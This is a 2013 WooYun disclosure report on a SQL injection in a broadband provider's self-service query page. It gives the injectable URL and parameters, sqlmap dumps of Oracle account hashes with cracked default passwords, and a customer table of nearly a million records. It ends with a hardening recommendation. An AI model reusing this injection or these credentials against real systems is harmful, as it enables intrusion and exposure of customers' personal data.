乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-09-26: 细节已通知厂商并且等待厂商处理中 2013-09-30: 厂商已经确认,细节仅向厂商公开 2013-10-10: 细节向核心白帽子及相关领域专家公开 2013-10-20: 细节向普通白帽子公开 2013-10-30: 细节向实习白帽子公开 2013-11-10: 细节向公众公开
百万的用户数据。
需要登录注入。http://sqsvc.btte.net/self-service/udr.do?method=QueryForListpost:startyear=2011&startmonth=02俺们家就是用的宽带通,2年50Mb超便宜。。。。
org.springframework.jdbc.BadSqlGrammarException: StatementCallback; bad SQL grammar [ select b.* from ( select a.*,rownum row_id from ( select to_char(u.STARTTIME,'yyyy-mm-dd hh24:mi:ss') STARTTIME, to_char(u.STOPTIME,'yyyy-mm-dd hh24:mi:ss') STOPTIME, GWIP, SESSIONID, ID, USERNAME, SCHEMADETAILID, PRODUCTID, CUSTID, CALLINGID, CALLEDID, FRAMEDIPADDR, NASIDENTIFIER, NASPORTTYPE, NASPORTID, NASPORT, DURATION, DOWNOCTETS, UPOCTETS, DISCONNECTCAUSE, STREAMUSAGE, CHARGEFLAG, INSERTTIME,DURATIONUSAGE from bssudr u where u.custid=159192580 AND to_char(STARTTIME,'yyyy-mm') = '2002-01'' ORDER BY ID asc ) a ) b where row_id>0 and row_id<=10]; nested exception is java.sql.SQLException: ORA-01756: quoted string not properly terminated org.springframework.jdbc.support.SQLStateSQLExceptionTranslator.translate(SQLStateSQLExceptionTranslator.java:89) org.springframework.jdbc.support.SQLErrorCodeSQLExceptionTranslator.translate(SQLErrorCodeSQLExceptionTranslator.java:258) org.springframework.jdbc.core.JdbcTemplate.execute(JdbcTemplate.java:294) org.springframework.jdbc.core.JdbcTemplate.query(JdbcTemplate.java:348) org.springframework.jdbc.core.JdbcTemplate.query(JdbcTemplate.java:352) org.springframework.jdbc.core.JdbcTemplate.query(JdbcTemplate.java:356) org.springframework.jdbc.core.JdbcTemplate.queryForList(JdbcTemplate.java:387) com.dfrk.udr.udrImpl.getList(udrImpl.java:81) sun.reflect.GeneratedMethodAccessor55.invoke(Unknown Source) sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25) java.lang.reflect.Method.invoke(Method.java:585) org.springframework.aop.support.AopUtils.invokeJoinpointUsingReflection(AopUtils.java:287) org.springframework.aop.framework.ReflectiveMethodInvocation.invokeJoinpoint(ReflectiveMethodInvocation.java:181) org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:148) org.springframework.transaction.interceptor.TransactionInterceptor.invoke(TransactionInterceptor.java:96) org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:170) org.springframework.aop.framework.JdkDynamicAopProxy.invoke(JdkDynamicAopProxy.java:176) $Proxy3.getList(Unknown Source) com.dfrk.udr.udrAction.QueryForList(udrAction.java:98) sun.reflect.GeneratedMethodAccessor54.invoke(Unknown Source) sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25) java.lang.reflect.Method.invoke(Method.java:585) org.apache.struts.actions.DispatchAction.dispatchMethod(DispatchAction.java:274) org.apache.struts.actions.DispatchAction.execute(DispatchAction.java:194) org.apache.struts.action.RequestProcessor.processActionPerform(RequestProcessor.java:419) org.apache.struts.action.RequestProcessor.process(RequestProcessor.java:224) org.apache.struts.action.ActionServlet.process(ActionServlet.java:1194) org.apache.struts.action.ActionServlet.doPost(ActionServlet.java:432) javax.servlet.http.HttpServlet.service(HttpServlet.java:710) javax.servlet.http.HttpServlet.service(HttpServlet.java:803) com.dfrk.filter.SetCharacterEncodingFilter.doFilter(SetCharacterEncodingFilter.java:52)
提交个单引号就报错了。。。。
[*] _NEXT_USER [1]: password hash: NULL[*] ANONYMOUS [1]: password hash: anonymous[*] AQ_ADMINISTRATOR_ROLE [1]: password hash: NULL[*] AQ_USER_ROLE [1]: password hash: NULL[*] AUTHENTICATEDUSER [1]: password hash: NULL[*] BILL [1]: password hash: CC249ABB49423C1E[*] BOSS [1]: password hash: A472100D4E2AEFE8[*] CONNECT [1]: password hash: NULL[*] CTXAPP [1]: password hash: NULL[*] CTXSYS [1]: password hash: 71E687F036AD56E5 clear-text password: CHANGE_ON_INSTALL[*] CWM_USER [1]: password hash: NULL[*] DBA [1]: password hash: NULL[*] DBSNMP [1]: password hash: 9CF003410A739C6E clear-text password: SYS[*] DELETE_CATALOG_ROLE [1]: password hash: NULL[*] DIP [1]: password hash: CE4A36B8E06CA59C clear-text password: DIP[*] DMSYS [1]: password hash: BFBA5A553FD9E28A clear-text password: DMSYS[*] EJBCLIENT [1]: password hash: NULL[*] EXECUTE_CATALOG_ROLE [1]: password hash: NULL[*] EXFSYS [1]: password hash: 66F4EF5650C20355 clear-text password: EXFSYS[*] EXP_FULL_DATABASE [1]: password hash: NULL[*] GATHER_SYSTEM_STATISTICS [1]: password hash: NULL[*] GLOBAL_AQ_USER_ROLE [1]: password hash: GLOBAL[*] HATEST [1]: password hash: 2428525244F46E78 clear-text password: HATEST[*] HS_ADMIN_ROLE [1]: password hash: NULL[*] IMP_FULL_DATABASE [1]: password hash: NULL[*] JAVA_ADMIN [1]: password hash: NULL[*] JAVA_DEPLOY [1]: password hash: NULL[*] JAVADEBUGPRIV [1]: password hash: NULL[*] JAVAIDPRIV [1]: password hash: NULL[*] JAVASYSPRIV [1]: password hash: NULL[*] JAVAUSERPRIV [1]: password hash: NULL[*] KEFU [1]: password hash: 744813B3A9664A05 clear-text password: KEFU[*] LOGSTDBY_ADMINISTRATOR [1]: password hash: NULL[*] MDDATA [1]: password hash: DF02A496267DEE66 clear-text password: MDDATA[*] MDSYS [1]: password hash: 72979A94BAD2AF80 clear-text password: MDSYS[*] MGMT_USER [1]: password hash: NULL[*] MGMT_VIEW [1]: password hash: 97468D731528F016[*] OEM_ADVISOR [1]: password hash: NULL[*] OEM_MONITOR [1]: password hash: NULL[*] OLAP_DBA [1]: password hash: NULL[*] OLAP_USER [1]: password hash: NULL[*] OLAPI_TRACE_USER [1]: password hash: NULL[*] OLAPSYS [1]: password hash: invalid[*] ORACLE_OCM [1]: password hash: 6D17CF1EB1611F94 clear-text password: ORACLE_OCM[*] ORDPLUGINS [1]: password hash: 88A2B2C183431F00 clear-text password: ORDPLUGINS[*] ORDSYS [1]: password hash: 7EFA02EC7EA6B86F clear-text password: ORDSYS[*] OUTLN [1]: password hash: 4A3BA55E08595C81 clear-text password: OUTLN[*] PUBLIC [1]: password hash: NULL[*] RECOVERY_CATALOG_OWNER [1]: password hash: NULL[*] RESOURCE [1]: password hash: NULL[*] SCHEDULER_ADMIN [1]: password hash: NULL[*] SCOTT [1]: password hash: F894844C34402B67 clear-text password: TIGER[*] SELECT_CATALOG_ROLE [1]: password hash: NULL[*] SELFAAA [1]: password hash: AC6792E5D2B3639D clear-text password: 123456[*] SI_INFORMTN_SCHEMA [1]: password hash: 84B8CBCA4D477FA3 clear-text password: SI_INFORMTN_SCHEMA[*] SYS [1]: password hash: 5638228DAF52805F clear-text password: MANAGER[*] SYSMAN [1]: password hash: 447B729161192C24 clear-text password: SYSMAN[*] SYSTEM [1]: password hash: D4DF7931AB130E37 clear-text password: MANAGER[*] TSMSYS [1]: password hash: 3DF26A8B17D0F29F clear-text password: TSMSYS[*] VINCENT [1]: password hash: CA4C68AFC00A6AF9[*] WM_ADMIN_ROLE [1]: password hash: NULL[*] WMSYS [1]: password hash: 7C9BA362F8314299 clear-text password: WMSYS[*] XDB [1]: password hash: 88D8364765FCE6AF clear-text password: CHANGE_ON_INSTALL[*] XDBADMIN [1]: password hash: NULL[*] XDBWEBSERVICES [1]: password hash: NULL
好多的默认密码
back-end DBMS: Oracleavailable databases [17]:[*] BILL[*] BOSS[*] CTXSYS[*] DBSNMP[*] DMSYS[*] EXFSYS[*] MDSYS[*] OLAPSYS[*] ORDSYS[*] OUTLN[*] SCOTT[*] SYS[*] SYSMAN[*] SYSTEM[*] TSMSYS[*] WMSYS[*] XDB
BILL数据库是一些上网记录查询的?
Database: BOSS+--------------+---------+| Table | Entries |+--------------+---------+| BSSCUSTOMERS | 993994 |+--------------+---------+
百万数据泄露信息包括身份证、住址、电话、姓名等。危害很大。
我相信利用oracle 神马的java存储过程 可以拿到服务器权限,但是万一数据库宕机,我就悲催了。
过滤。服务器方面要金星加固,更改oracle默认密码
危害等级:高
漏洞Rank:12
确认时间:2013-09-30 21:04
暂无